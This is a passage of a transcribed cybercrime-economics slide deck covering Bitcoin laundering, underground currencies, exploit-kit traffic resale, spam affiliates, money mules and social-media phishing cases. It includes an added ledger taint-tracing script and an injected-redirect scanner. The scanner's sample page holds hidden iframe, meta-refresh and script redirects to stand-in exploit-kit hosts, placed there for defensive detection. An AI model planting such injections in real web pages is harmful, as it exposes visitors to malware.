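To make the "pseudonymous, not anonymous" point and the round-tripping flow above concrete, here is an added example that is not part of the original deck nor of the WEF project: a toy public ledger, a breadth-first taint walk from a seed address (the carding proceeds) to addresses an investigator has attributed to an exchanger, and the common-input-ownership clustering heuristic. Every address, transaction id, amount and the exchanger attribution below is constructed for the demo.

```python
"""
Added example (not from the original deck or the WEF project): "follow the
money" over a constructed public ledger. Addresses, txids, amounts and the
exchanger attribution are all made up for the demo.
"""
from collections import deque

# Constructed sample ledger. Each tx spends from its input address(es) and
# pays several outputs; t2 fans the proceeds out into three "smurf" accounts,
# two of which are then cashed out at an exchanger deposit address.
LEDGER = [
    {"txid": "t1", "inputs": ["1CarderA"], "outputs": [("1MixHub", 9.0), ("1CarderA", 1.0)]},
    {"txid": "t2", "inputs": ["1MixHub", "1MixAux"],
     "outputs": [("1Smurf1", 3.0), ("1Smurf2", 3.0), ("1Smurf3", 3.0)]},
    {"txid": "t3", "inputs": ["1Smurf1"], "outputs": [("3ExchDeposit", 3.0)]},
    {"txid": "t4", "inputs": ["1Smurf2"], "outputs": [("3ExchDeposit", 3.0)]},
    {"txid": "t5", "inputs": ["1Smurf3"], "outputs": [("1Cold", 3.0)]},
    {"txid": "t6", "inputs": ["1Honest"], "outputs": [("1Shop", 0.5)]},
]

# Assumed: addresses already attributed to an exchanger (e.g. from KYC records).
EXCHANGER_ADDRESSES = {"3ExchDeposit"}


def build_graph(ledger):
    """Return address -> list of (next_address, amount, txid) spend edges."""
    graph = {}
    for tx in ledger:
        for src in tx["inputs"]:
            for dst, amount in tx["outputs"]:
                if dst == src:          # change back to the spender is not a hop
                    continue
                graph.setdefault(src, []).append((dst, amount, tx["txid"]))
    return graph


def trace_taint(ledger, seed, exchanger_addresses, max_hops=6):
    """
    Breadth-first walk from a seed address over the spend graph.
    Returns (tainted_addresses, cash_outs) where each cash_out is
    (list_of_txids, amount) for a hop that lands on an exchanger address.
    The hop limit matters in practice: mixers fan out deliberately.
    """
    graph = build_graph(ledger)
    tainted = {seed}
    cash_outs = []
    queue = deque([(seed, [], 0)])
    while queue:
        addr, path, hops = queue.popleft()
        if hops >= max_hops:
            continue
        for nxt, amount, txid in graph.get(addr, []):
            new_path = path + [txid]
            if nxt in exchanger_addresses:
                cash_outs.append((new_path, amount))
            if nxt not in tainted:
                tainted.add(nxt)
                queue.append((nxt, new_path, hops + 1))
    return tainted, cash_outs


def cluster_common_input(ledger):
    """
    Common-input-ownership heuristic: addresses spent together in one
    transaction are assumed to share an owner. Returns a list of address sets.
    This is the main reason Bitcoin is pseudonymous rather than anonymous.
    """
    clusters = []
    for tx in ledger:
        ins = set(tx["inputs"])
        overlapping = [c for c in clusters if c & ins]
        for c in overlapping:
            ins |= c
            clusters.remove(c)
        clusters.append(ins)
    return clusters


if __name__ == "__main__":
    tainted, cash_outs = trace_taint(LEDGER, "1CarderA", EXCHANGER_ADDRESSES)
    print("tainted:", sorted(tainted))
    for path, amount in cash_outs:
        print("cash-out via", "->".join(path), "amount", amount)
    print("clusters:", cluster_common_input(LEDGER))
```

In a real investigation the ledger comes from a full node or a block-explorer export and the exchanger attribution from KYC or subpoena data; the shape of the query is the same, which is exactly the investigative opportunity the "follow the money" slides later point at.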
115. Summarizing on Bitcoins
  - While Bitcoins can be used legitimately, they are used by cybercriminals to launder money.
  - An unsecured network can be used by the same cybercriminals, thereby indirectly increasing their gains.
  - More regulation is required in this area.
  - We would like to use international credit card fraud data to further examine the extent to which Bitcoins are related to fraud.
  - The data has been difficult to obtain so far.
116. How do you pay for cybercrime services/products?
  - Cash (face to face)
  - Offshore bank accounts
  - Underground currencies (digital)
  - NOTE: it's not just about Bitcoins!
117. HAWALA
118. Learning from terrorism financial models
119. Underground currencies
120. "Underground" currencies
121. "Underground" currencies
122. "Underground" currencies
123. "Underground" currencies
124. "Underground" currencies
125. "Underground" currencies
126. "Underground" currencies
127. "Underground" currencies
128. "Underground" currencies
129. "Underground" currencies
130. Bad guys hacking bad guys
131. Cashing out
132. Investigative opportunities
133. «Follow the money»: Judge Giovanni Falcone, killed by the Italian mafia with a bomb on the highway in Sicily on May 23rd, 1992.
134. «Follow the money!»
135. Credit cards & goods
136. Main approaches to cash-out
137. Insights
138. Click-fraud campaigns: ClickForensics stats tell us that back in 2008 cybercrime gained $33 million from click-fraud campaigns.
139. «Traffic» re/sellers. Advert shown: traffic from web sites/users in US, UK, AU, CA and DE; 1,000 visits at $7; minimum buy 5,000 visits. What is sold here is «traffic», meaning the HTTP requests of unaware users visiting regular but compromised (hacked) web sites. Those requests are redirected to malicious domains (owned by the buyer of the service), which usually host «exploit kits». Very often the sold traffic is also generated through MSN, Facebook and LinkedIn spam.
140. «Traffic» re/sellers
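The «traffic» described above is produced by code injected into hacked sites. As an added example that is not from the deck nor from any vendor, here is a small scanner for the three most common injection shapes: a hidden off-site iframe, a meta refresh, and a location assignment inside a script. The page HTML, the site host and the domain names are constructed for the demo; real injections are usually obfuscated, so this is the baseline check a web admin would run, not a complete detector.

```python
"""
Added example (not from the original deck): flag injected off-site redirects
in a page served by a possibly compromised site. Sample page, host and domain
names are constructed for the demo.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

SITE_HOST = "www.example-shop.test"   # assumed: the host whose pages are scanned

# Constructed page: one legitimate same-site iframe plus three injections.
SAMPLE_PAGE = """
<html><head>
<meta http-equiv="refresh" content="0;url=http://cdn-stats.bad.test/in.cgi?3">
</head><body>
<h1>Welcome</h1>
<iframe src="http://www.example-shop.test/ads.html" width="300" height="250"></iframe>
<iframe src="http://g00gle-analitics.bad.test/ek/" width="1" height="1" style="visibility:hidden"></iframe>
<script>if(document.cookie.indexOf("v")==-1){window.location="http://ek.bad.test/gate.php";}</script>
</body></html>
"""

# window.location = "...", document.location.href = '...', location = "..."
JS_REDIRECT = re.compile(
    r"""(?:window\.|document\.|top\.)?location(?:\.href)?\s*=\s*["']([^"']+)["']""", re.I)


def _offsite(url, site_host):
    """True when the URL has a host and it is not the scanned site."""
    host = urlparse(url).hostname
    return bool(host) and host.lower() != site_host.lower()


def _hidden(attrs):
    """Zero/one-pixel or CSS-hidden frames are the classic injection marker."""
    a = {k.lower(): (v or "") for k, v in attrs}
    tiny = a.get("width", "").strip() in ("0", "1") or a.get("height", "").strip() in ("0", "1")
    css = a.get("style", "").replace(" ", "").lower()
    return tiny or "display:none" in css or "visibility:hidden" in css


class RedirectFinder(HTMLParser):
    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host
        self.findings = []          # list of (kind, url)
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "iframe":
            src = a.get("src") or ""
            if _offsite(src, self.site_host) and _hidden(attrs):
                self.findings.append(("hidden_iframe", src))
        elif tag == "meta" and (a.get("http-equiv") or "").lower() == "refresh":
            m = re.search(r"url\s*=\s*(\S+)", a.get("content") or "", re.I)
            if m and _offsite(m.group(1), self.site_host):
                self.findings.append(("meta_refresh", m.group(1)))
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # html.parser hands script bodies to handle_data as raw text
        if self._in_script:
            for url in JS_REDIRECT.findall(data):
                if _offsite(url, self.site_host):
                    self.findings.append(("js_location", url))


def scan_page(html, site_host=SITE_HOST):
    """Return the (kind, url) off-site redirects found in one page."""
    p = RedirectFinder(site_host)
    p.feed(html)
    p.close()
    return p.findings


if __name__ == "__main__":
    for kind, url in scan_page(SAMPLE_PAGE):
        print(f"{kind:14s} {url}")
```

Run it over a crawl of your own site (or a cached copy from a search engine, which is what the buyers of this traffic rely on) and treat any hit on a host you do not own as a compromised page to be pulled and reviewed.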
141. Spam campaigns: among the highest-revenue business models for a botnet master is spam. Here we can see an organization named «EvaPharmacy» which offers «affiliations for botnets»: in exchange for a spam campaign, they pay 45% on every product (priced between $60 and $100) sold through that affiliate's own campaign. Botnets are estimated to be the source of 85% of global spam.
142. Global business
143. Money mules: «very normal people?»
144. Complex management: the phisher
145. OSINT and investigations: "Open sources can provide up to 90% of the information needed to meet most U.S. intelligence needs" -- Deputy Director of National Intelligence, Thomas Fingar
146. OSINT and investigations
147. OSINT, social and mules
148. Sometimes, easy to catch... Criminal persona vs. real persona: money mule Yulia Klepikova
149. Sometimes, easy to catch...
150. Going «social»
151. Social media: "Social media are a set of Web 2.0 platforms, thanks to which users interact directly, producing and sharing their own content and/or editing others', in real time" (Wikipedia). This is certainly true, but...
  - Why are they (mostly) free?
  - Who owns them (really)?
  - Who controls them (really)?
  - What do they do with everybody's social graphs and behaviours?
  - And with all of that information?
  - What about all of those pictures?
  - What's written inside their EULAs?
  - Are they filtered?
  - Are they neutral?
  - Are they secure?
152. Social networks as weapons?
154. SN = cybercrime heaven (and IAs!)
155. Social as (possible) business risk
156. Social and the risks for users (unaware, newbies...)
157. Phishing via Facebook
158. Spear phishing («sender»: Facebook)
159. Spear phishing on a professional SN (LinkedIn)
160. Twitter and PsyOps
161. Associated Press, Twitter and NYSE: the hijacking of the AP Twitter account caused a loss of $53B at the NYSE.... Who gained from this??
162. The «Alpitour» case study
163. The «Alpitour» case study: MO and goals
  - Gang #1 (North Africa) hacks, on September 11, 2013, the Facebook profile of the travel company group (Viaggidea, Francorosso, Villaggi Bravo, Alpitour), gaining full control (spear-phishing attack).
    o They start posting fake offers (look at those irresistible beach images and those special prices you can't miss!); the links drove users to a new variant of the Zeus malware.
    o On average 120,000 users were exposed to serious risks.
    o Over the next 48 hours, many messages were posted on different social profiles of the Group; the Group later deleted those messages from Facebook, while they remained visible for weeks on the Alpitour Twitter account, since an auto-post feature had been configured.
  - Gang #2 (Gulf area), 13-14 September 2013
    o The posts from these dates look much different (grammar, contents).
    o Probably Gang #1 sold the access to Gang #2. The posts show very bad Italian language and grammar. Later, the attacker(s) published some posts in Arabic, and made grammar mistakes when writing in English (e.g. "bages" rather than "pages").
    o In this second abuse case, the gang used the infected accounts to send «trusted» malicious links, thus gaining full control of the target devices in order to send massive spam.
165. Web reputation, indexing, media/press, posts, social...
166. One year later
167. Wrap up: solutions. Full review of your own approaches and models (new threats, new scenarios):
  - Risk management "2.0" and (cyber) crisis management policies: PR, Legal, Security, Board
  - Social networks
  - Web applications (OWASP, S-SDLC, secure coding!!!)
  - Apps (especially if from the banking industry)
  - Insecurity on the e-banking customer's client side (OS, routers, phishing)
  - Anti-DDoS procedures
  - Security testing (stop "low budget" = low quality!)
  - Use of methodologies! (OSSTMM + RAVs)
  - Talk to each other (IT, Security, PR and Marketing: all together...)
  - "Cyber" crisis simulations
  - Procedures and dedicated teams for digital forensics (ahead of an incident, not after!!)
  - Cybercrime intelligence
  - IPv6
168. Acknowledgements (Bitcoin research and underground currencies): Dr George Li, BSc (Syd), BCom (Syd, Hons. I), PhD (Syd); Antonio Guerrero, PG Dip Management, MGSM, MBA (2014), MGSM; Fyodor Yarochkin (the "Xprobe2" guy)
169. Reading Room /1
● The Commercialization of Digital Spying, Morgan Marquis-Boire, Claudio Guarnieri, Bill Marczak, John Scott-Railton, Citizen Lab, Canada Centre for Global Security Studies, Munk School of Global Affairs (University of Toronto), 2013
● No Place to Hide: Edward Snowden, the NSA and the Surveillance State, Glenn Greenwald, Penguin Books, 2014
● Kingpin, Kevin Poulsen, Hoepli Editore, 2012
● Profiling Hackers: the Science of Criminal Profiling as Applied to the World of Hacking, Raoul Chiesa, Stefania Ducci, Silvio Ciappi, CRC Press/Taylor & Francis Group, 2009
● H.P.P. Questionnaires 2005-2010
● Fatal System Error: the Hunt for the New Crime Lords who are Bringing Down the Internet, Joseph Menn, Public Affairs, 2010
● Stealing the Network: How to 0wn a Continent, (an Identity), (a Shadow) (V.A.), Syngress Publishing, 2004, 2006, 2007
● Stealing the Network: How to 0wn the Box (V.A.), Syngress Publishing, 2003
● Underground: Tales of Hacking, Madness and Obsession on the Electronic Frontier, Suelette Dreyfus, Random House Australia, 1997
● The Cuckoo's Egg: Tracking a Spy Through the Maze of Computer Espionage, Clifford Stoll, DoubleDay (1989), Pocket (2000)
● Masters of Deception: the Gang that Ruled Cyberspace, Michelle Slatalla & Joshua Quittner, HarperCollins, 1995
● Kevin Poulsen, Serial Hacker, Jonathan Littman, Little & Brown, 1997
● Takedown, John Markoff and Tsutomu Shimomura, Sperling & Kupfer (Hyperion Books), 1996
● The Fugitive Game: Online with Kevin Mitnick, Jonathan Littman, Little & Brown, 1997
● The Art of Deception, Kevin D. Mitnick & William L. Simon, Wiley, 2002
● The Art of Intrusion, Kevin D. Mitnick & William L. Simon, Wiley, 2004
● @ Large: the Strange Case of the World's Biggest Internet Invasion, Charles Mann & David Freedman, Touchstone, 1998
170. Reading Room /2
● The Estonia Attack: Battling Botnets and Online Mobs, Gadi Evron, 2008 (white paper)
● Who is "n3td3v"?, Hacker Factor Solutions, 2006 (white paper)
● Mafiaboy: How I Cracked the Internet and Why It's Still Broken, Michael Calce with Craig Silverman, 2008
● The Hacker Diaries: Confessions of Teenage Hackers, Dan Verton, McGraw-Hill Osborne Media, 2002
● Cyberpunk: Outlaws and Hackers on the Computer Frontier, Katie Hafner, Simon & Schuster, 1995
● Cyber Adversary Characterization: Auditing the Hacker Mind, Tom Parker, Syngress, 2004
● Inside the SPAM Cartel: Trade Secrets from the Dark Side, Spammer X, Syngress, 2004
● Hacker Cracker, Ejovi Nuwere with David Chanoff, Harper Collins, 2002
● Compendio di criminologia (Compendium of Criminology), Ponti G., Raffaello Cortina, 1991
● Criminalità da computer (Computer Crime), Tiedemann K., in Trattato di criminologia, medicina criminologica e psichiatria forense, vol. X, Il cambiamento delle forme di criminalità e devianza, Ferracuti F. (ed.), Giuffrè, 1988
● United Nations Manual on the Prevention and Control of Computer-related Crime, in International Review of Criminal Policy, Nos. 43 and 44
● Criminal Profiling: dall'analisi della scena del delitto al profilo psicologico del criminale (Criminal Profiling: from Crime Scene Analysis to the Psychological Profile of the Offender), Massimo Picozzi, Angelo Zappalà, McGraw Hill, 2001
● Deductive Criminal Profiling: Comparing Applied Methodologies Between Inductive and Deductive Criminal Profiling Techniques, Turvey B., Knowledge Solutions Library, January 1998
● Malicious Hackers: a Framework for Analysis and Case Study, Laura J. Kleen, Captain, USAF, US Air Force Institute of Technology
● Criminal Profiling Research Site. Scientific Offender Profiling Resource in Switzerland. Criminology, Law, Psychology, Täterpro
171. Contacts, Q&A. Need anything, got doubts, want to ask us something? rc [at] security-brokers [dot] com, sg [at] security-brokers [dot] com. Thanks for your attention! QUESTIONS?